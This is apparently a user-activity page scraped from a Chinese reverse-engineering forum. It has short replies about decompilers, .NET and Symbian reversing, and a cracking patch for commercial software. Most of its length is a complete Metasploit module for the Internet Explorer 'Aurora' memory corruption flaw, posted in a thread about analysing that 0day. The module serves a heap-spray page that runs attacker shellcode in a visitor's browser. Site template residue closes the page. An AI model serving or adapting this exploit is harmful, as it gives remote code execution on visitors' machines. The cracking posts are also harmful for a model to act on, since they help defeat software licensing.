|
|
[求助]上海颐东网络信息有限公司高薪招聘 信息安全开发工程师
原来 YT锅 在这里 |
|
|
|
|
|
C/C++反编译器C-Decompilerv1.1发布
1111111111 |
|
|
[原创].net逆向学习总结系列[2.24更新:.net逆向学习总结002(1)]
建议相关资料归档 打包。 |
|
|
C/C++反编译器C-Decompilerv1.1发布
C-Decompiler.exe C-Decompiler.exe output\ |
|
|
[讨论]做个调查,有分析IE最新极光0day漏洞的吗?
##看到HDM的这个可以确定了 ,世界又要开始新的一轮疯狂了
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#6ccK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3#2W2N6r3q4K6M7r3I4G2K9i4c8Q4x3X3g2U0L8$3#2Q4x3V1k6X3M7X3q4E0k6i4N6G2M7X3E0Q4x3V1j5`.
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
'Description' => %q{
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown',
'hdm' # Metasploit port
],
'Version' => '$Revision: 8136 $',
'References' =>
[
['URL', '58eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6j5%4u0G2M7$3!0X3N6q4)9J5k6h3y4G2L8g2)9J5c8Y4c8W2j5$3S2F1k6i4c8Q4x3V1k6K6k6h3y4#2M7X3W2@1P5g2)9J5c8X3q4V1N6X3W2K6L8%4u0&6i4K6u0r3z5e0M7&6x3K6f1J5i4K6u0W2L8i4y4H3P5q4)9J5y4#2)9#2c8q4)9J5b7H3`.`.
['URL', 'f14K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6W2M7r3q4%4k6i4c8Q4x3X3g2A6M7$3g2U0L8r3q4T1i4K6u0W2L8%4u0Y4i4K6u0r3N6X3W2W2N6#2)9J5k6i4m8Z5M7q4)9K6c8X3S2S2M7$3S2Q4x3@1b7I4j5h3g2S2x3U0l9$3j5h3p5$3y4r3g2T1k6h3q4T1j5U0l9%4x3U0x3%4k6U0q4W2x3U0t1K6x3r3b7H3k6W2)9J5y4Y4c8&6M7r3g2Q4x3@1c8B7M7#2)9J5y4#2)9#2c8l9`.`.
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
if (request.uri.match(/\.gif/i))
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
send_response(cli, data, { 'Content-Type' => 'image/gif' })
return
end
var_memory = rand_text_alpha(rand(100) + 1)
var_boom = rand_text_alpha(rand(100) + 1)
var_x1 = rand_text_alpha(rand(100) + 1)
var_e1 = rand_text_alpha(rand(100) + 1)
var_e2 = rand_text_alpha(rand(100) + 1)
var_comment = rand_text_alpha(rand(100) + 1);
var_abc = rand_text_alpha(3);
var_ev1 = rand_text_alpha(rand(100) + 1)
var_ev2 = rand_text_alpha(rand(100) + 1)
var_sp1 = rand_text_alpha(rand(100) + 1)
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
rand_html = rand_text_english(rand(400) + 500)
html = %Q|<html>
<head>
<script>
var #{var_comment} = "COMMENT";
var #{var_x1} = new Array();
for (i = 0; i < 200; i ++ ){
#{var_x1} = document.createElement(#{var_comment});
#{var_x1}.data = "#{var_abc}";
};
var #{var_e1} = null;
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
function #{var_boom}() {
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
}
function #{var_ev1}(evt){
#{var_boom}();
#{var_e1} = document.createEventObject(evt);
document.getElementById("#{var_sp1}").innerHTML = "";
window.setInterval(#{var_ev2}, 50);
}
function #{var_ev2}(){
p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
for (i = 0; i < #{var_x1}.length; i ++ ){
#{var_x1}.data = p;
}
var t = #{var_e1}.srcElement;
}
</script>
</head>
<body>
<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>
</body>
</html>
|
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
# Handle the payload
handler(cli)
end
end
|
|
|
|
|
|
[原创]Red Gate全软件全版本破解补丁
建议Megax 把支持的原版文件一并打包。收藏。 |
|
|
|
|
|
|
|
|
[原创]Symbian_Remote_Debugger_With_IDA
你走弯路了 拷贝手机上安装好的文件到pc, 和对。net的分析是一样的。 windows mobile 上开发的软件 一些是基于。net framework 精简版的 联机调试,在有源码的时候还不错 真正要去分析二进制文件,还是静态看看吧,不难。 元旦 放一个 简单的 wm crackme和教程 |
|
|
[活动结束]看雪十周年论坛活动 [1楼己公布结果]
rar密码秒破 |
|
|
|
|
|
|
|
|
|
|
|
求助]对cater的教程《Symbian S60 3rd Reverse CrAcKiNg Tutorial》的一些问题
ae2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5c8V1q4J5N6r3W2U0L8r3g2Q4x3V1k6e0P5h3#2T1K9h3q4F1i4K6g2X3f1K6j5H3i4K6g2X3x3%4u0V1i4K6g2X3b7i4m8H3L8r3W2U0j5i4c8A6L8$3&6Q4y4h3k6o6M7X3q4U0K9$3W2F1k6#2)9#2k6W2N6A6N6r3S2Q4y4h3k6u0c8p5q4Q4y4h3k6d9k6h3#2G2N6r3g2Q4y4h3k6p5k6h3u0#2k6$3g2J5i4K6g2X3g2s2g2@1L8%4u0A6j5h3I4Q4y4h3k6n7P5g2)9#2k6V1y4S2N6r3g2J5f1h3W2#2i4K6u0W2K9s2c8E0L8q4)9J5k6h3S2@1L8h3H3`. 姑娘,手机号码发我 |
|
|
[讨论]手机系统DIY
楼主举一个,你满意的手机和系统 |
|
|
|
|
|
|
不过 不说
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
勋章
兑换勋章
证书
证书查询 >
能力值
